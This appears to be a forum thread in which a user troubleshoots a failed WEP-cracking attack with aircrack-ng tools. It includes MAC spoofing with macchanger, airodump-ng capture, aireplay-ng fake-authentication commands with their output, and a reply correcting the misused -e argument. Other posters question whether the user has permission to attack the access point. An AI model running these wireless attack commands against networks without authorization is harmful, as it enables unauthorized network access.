Help Correct My Attack
I have a netgear wg511t pcmcia card. I have done a successful WEP crack before using this card and this method but for some reason this isn't working with the particular AP in question.
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0F:3D:29:86:6F 46 100 6519 1362 1 6 54. WEP WEP default
00:15:E9:E4:28:C9 6 1 4968 24 0 6 54. WEP WEP default
00:19:5B:E0:95:58 17 0 4587 0 0 6 54. WEP WEP OPN PenTestNetwork
00:11:95:2C:51:E4 1 0 233 8 0 6 54. OPN hawkes
00:90:4C:7E:00:10 -1 0 0 0 0 6 -1 telstra
Now it is the aireplay-ng command which isn't being successful. I get,
airodump-ng -c 6 -w dumpfile --bssid 00:19:5B:E0:95:58 ath0
aireplay-ng -1 0 -a 00:19:5B:E0:95:58 -e 00:19:5B:E0:95:58 -h 00:11:22:33:44:55 ath0
Can anyone help me out? Give me some ideas?
bt ~ # aireplay-ng -1 0 -a 00:19:5B:E0:95:58 -e 00:19:5B:E0:95:58 -h 00:11:22:33:44:55 ath0
13:09:40 Sending Authentication Request
13:09:40 Authentication successful
13:09:40 Sending Association Request
13:09:45 Sending Authentication Request
13:09:45 Authentication successful
13:09:45 Sending Association Request
13:09:50 Sending Authentication Request
13:09:50 Authentication successful
13:09:50 Sending Association Request
13:09:55 Sending Authentication Request
13:09:55 Authentication successful
13:09:55 Sending Association Request
13:10:00 Sending Authentication Request
13:10:00 Authentication successful
13:10:00 Sending Association Request
13:10:05 Sending Authentication Request
13:10:05 Authentication successful
13:10:05 Sending Association Request
13:10:10 Sending Authentication Request
13:10:10 Authentication successful
13:10:10 Sending Association Request
13:10:15 Sending Authentication Request
13:10:15 Authentication successful
13:10:15 Sending Association Request
13:10:20 Sending Authentication Request
13:10:20 Authentication successful
13:10:20 Sending Association Request
13:10:25 Sending Authentication Request
13:10:25 Authentication successful
13:10:25 Sending Association Request
13:10:30 Sending Authentication Request
13:10:30 Authentication successful
13:10:30 Sending Association Request
13:10:35 Sending Authentication Request
13:10:36 Authentication successful
13:10:36 Sending Association Request
13:10:43 Sending Authentication Request
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,
Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate (iwconfig <iface> rate 1M).
your AP or someone else's? do you have permission?
sounds like the victim ap have mac filtering enabled........
Not being a troll or anything but I think its because you are too far away m8t. Because MAC filtering wouldn't even let you associate at all.
Very low signal!!!
And Because of that make me think that the AP in question is not yours so I'm not going to say anymore.
I appologize if I am wrong :D
How far are you from the AP and what kind of model is the AP?
Apology accepted :p
Originally Posted by Dr_GrEeN
It's a D-Link and it's down 1 flight of stairs and about 20 metres away. The router is in my dad's study and i was sitting in my room, upstairs on the other side of the house.
Originally Posted by swc666
The PWR level was fluctuating between 15 and 25. So moving closer should help?
My dad said he doesn't even know what mac filtering is so i'm pretty sure it's not enabled.
You are using the BSSID for the ESSID bro.
the -e argument is where you put the ESSID and you put the MAC address there, thats why its partially successfull but ultimately fails.
Put the ESSID after the -e (its case sensitive) and try again, should work
Omg i have serious problems :P Thanks alot dude. Can't believe i missed that.
Originally Posted by SonyUSA
Thanks swc666... that's more or less what i was following except i messed up the whole essid thing as SonyUSA discovered.